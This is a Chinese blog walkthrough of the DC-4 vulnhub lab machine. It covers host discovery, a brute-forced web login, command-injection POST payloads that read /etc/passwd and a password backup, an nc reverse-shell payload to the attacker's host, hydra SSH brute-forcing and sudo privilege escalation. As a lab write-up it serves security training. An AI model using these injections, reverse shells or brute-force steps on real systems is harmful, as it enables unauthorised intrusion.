靶机 DC-4

最新推荐文章于 2023-12-22 19:55:27 发布
最新推荐文章于 2023-12-22 19:55:27 发布
阅读量318 收藏
点赞数
分类专栏: DC系列靶场 文章标签: linux 运维 服务器 php 网络协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_66299232/article/details/126937158
版权

环境准备

DC-4靶机链接:百度网盘 请输入提取码

提取码:jq25

虚拟机网络链接模式:桥接模式

攻击机系统:kali linux 2021.1

信息搜集

1.查看存活主机,根据分析得出 192.168.166.133是DC-4靶机IP地址。

arp-scan -l

2.利用nmap扫描开放端口。

nmap -A- -p -T4 192.168.166.133

3.发现22端口和80端口开放。

尝试访问 192.168.166.133 得到一个登录系统。

漏洞利用

尝试爆破登录

爆破得到账号:admin ,密码:happy

登录后得到一个命令执行的界面

方法一:

1.这里抓包尝试一下是否能绕过,产生命令执行。

radio=ls+-l|pwd&submit=Run

2.抓包看到可以利用管道符进行命令拼接。

尝试查看/etc/passwd。

radio=ls+-l|cat+/etc/passwd&submit=Run

3.查看家目录下的用户。

radio=ls -alhR /home&submit=Run

4.可以看到在/home/jim/backups目录下存在文件old-passwords.bak,可能是密码的备份文件。

尝试查看备份文件。

radio=ls -al|cat+/home/jim/backups/old-passwords.bak&submit=Run

方法二:

1.直接执行命令,进行shell反弹

radio=nc+KALIIP+1234+-e+/bin/sh&submit=Run

nc -nlvp 1234 设置监听 反弹shell

查看home目录 发现有三个用户 把目录切换到jim 查看到三个文件 打开backups

发现一个密码文档 打开查看

既然我们获得了旧密码,也获得了账户。

其实都是一种方法只不过换了种形式来获取密码文档

权限提升

hydra爆破

hydra -L user.txt -P password.txt ssh://192.168.166.133 //-L,-P 都是大写
login:jim
password:jibril04

爆破成功

ssh登录

1.拿到用户名和密码直接登录ssh

2.用find查看可以利用的命令

3.把目录切换到mail 发现有一封邮件

4.发现了另外一个账户,并且文中有该账户的密码。

login:charles
password:^xHhA&hvim0y

5.teehee这个root用户不需要密码就能登录,直接拿flag,轻松拿下!!!

魏钦6666
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DC-4靶机渗透测试
读书 买花 长大
04-18 763
DC-4
dc-4 靶机渗透学习
..
03-19 3052
信息收集 第一步还是老办法,探测主机存活。 nmap -sP 192.168.202.0/24 通过推断得出192.168.202.142是靶机,具体请看dc-2、dc-3,对靶机进行端口扫描。 nmap -A -p- -v 192.168.202.142 发现22、80端口开启,访问一下80端口,发现是个登录页面。 用Wappalyzer识别框架,没试别出,查看源代码发现只是一个简单的登录界面 这种情况感觉没必要再用nikto扫描了,尝试用bp爆...
DC-4靶机详细渗透过程
MRS_jianai的博客
11-30 543
dc4靶机渗透教程
DC-4靶机
weixin_50815573的博客
03-08 5630
一、DC-4的信息收集 1.确定IP,端口号; 命令:nmap -sP 192.168.159.0/24 探测到主机的ip为192.168.1.165,下一步进行端口判断; 命令:nmap -A -p- -T4 192.168.1.165 查看源码,我们可以收集到以下信息: 1.页面通过post提交 2.用户名的由username接收 3.密码由password接收 4.表单信息提交到login.php页面进行登陆判断 二、通过暴力破解密码,成功登陆 1.确定密码字典,.
vulnhub靶场渗透之DC-4渗透教程(超级详细)
旺仔Sec&blog
06-05 737
靶机下载链接作者DCAU发布日期2019年4月7日难度中等1、第一点主要考察我们的信息手机,敏感文件的查看,一定要尝试多种思路2、多抓一下包看看包文有没有可用的信息3、最后就是sudo靶机的提权,vulnhub靶场蛮多sudo提权的,我相信这个靶机的做法应该也不止我这一种,也欢迎大家来尝试发现多种做法!
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
dc-4靶机练习.docx
01-02
靶机在web信息收集,burp获取登陆用户名密码。 第二步:利用反弹shell后发现一封邮件,拿到新用户的登陆口令。 第三步:通过sudo -l]发现不用登录root可以使用的命令 [teehee --help][teehee -a]增加用户,具有...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
DC-4-Web渗透测试靶机
最新发布
01-19
DC-4-Web渗透测试靶机】是一个专门为网络安全专业人士设计的模拟环境,主要用于学习和实践Web渗透测试技术。在Web渗透测试中,目标是识别并利用网站应用程序的安全漏洞,以便于预防或修复这些漏洞,保护真实的网络...
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
DC-4渗透实战(详细过程)
tzyyyyyy的博客
10-17 825
DC-4靶机渗透实战 利用各种姿势方法获取最终flag
Vulnhub_DC-4靶机渗透测试
m0_66225311的博客
09-20 125
本次的DC-4靶机感觉难度挺简单,至少是第一次直接从靶机打到了提权部分,没看wp,因为exim4漏洞POC有使用过,直接提权上到root。在进行常规提权的时候查看了一下邮件信息的文件 找到了隐藏密码暴力破解登录网站shell命令执行直接反弹shell到kali上find 发现exim4提权POC suid提权wget 下载虚拟机网站的文件 无法上传文件到目标机上hydra对ssh登录爆破mbox邮件格式文件 /etc/mail 保存邮件信息。
DC系列-dc4靶机解析
qq_53309677的博客
12-22 400
现在我们可以开始爆破(hydra)admin的用户的密码 网页用户的爆破使用(http-post-form) "/login.php(登录的路径):username=adnmin&passwor=(上面BP拦截的登录信息复制下来)^PASS^:S=logout(密码爆破出来就停止进行爆破)" 爆破出来的密码为 “happy”进入home 发现许多用户 进入jim查看文件夹的里有 备份信息的文件夹 看到里面有密码 这时候下载到渗透机并爆破jim用户的密码。登录我们爆破出来的用户jim(发现用户下面说有。
Vulnhub靶机:DC-4渗透详细过程
IerkeU的博客
02-28 1871
基本步骤 前言提要: 靶场地址:DC: 4 ~ VulnHub DC-4是一个初中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 这次练习的靶机是vulnhub平台下的DC系列靶机第四台,该靶机的难度系数为简单,拿下该靶机的关键就是需要收集信息,最终目的是获取root权限,拿到flag。 步骤: 信息收集 nmap 192.168.132.0/24 目标靶机ip:192.168.132.150 全面扫描 n
DC-4靶机练习
千寻的博客
01-02 3071
DC-4靶机练习 第一步 扫描主机 [nmap -sP 192.168.139.0/24] 第二步 扫描端口 [nmap -A 192.168.139.147 -p 1-65535] 第三步 访问80网页 第四步 尝试使用burp获取账号和密码 Kali的浏览器中安装插件 proxy switch 打开burpon 打开抓包 [cat /usr/share/john/password.l...
DC-4靶机渗透
0XAXSDD的博客
06-10 1375
DC-4靶机渗透 直接vm打开靶机,NAT模式,nmap 扫描局域网存活的主机 发现142,直接上个全扫描 发现了开放了22 和80端口,分别对应的ssh和http服务 linux操作系统 浏览器打开网站 发现admin后台登录,这里直接用admin账号,不要问我咋知道的,直觉! bp爆破admin的口令 拿到口令登录: 命令执行,拦截包,重放,发现没有任何过滤机制 这里只是命令中的空格被+号代替,发现除了root用户之外,还有三个用户账户 这里执行直接反弹shell kali监听4444端口 p
DC-4靶场搭建及渗透实战详细过程(DC靶场系列)
金 帛的博客
07-28 4942
dc-4靶场详细渗透过程
DC_4 靶场夺旗
猎荒者
02-22 382
兵无常势,水无常形,能因敌而致胜者,谓之神 环境准备 VMware Workstation Pro12 Kali Linux (IP:10.10.16.128) DC_4 虚拟机 NAT 网络连接 1. 主机发现 方法一:fping -asg 10.10.16.0/24 方法二:nmap -sP 10.10.16.0/24 2. 端口扫描 nmap -A -v -sS -sV -p- ...
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值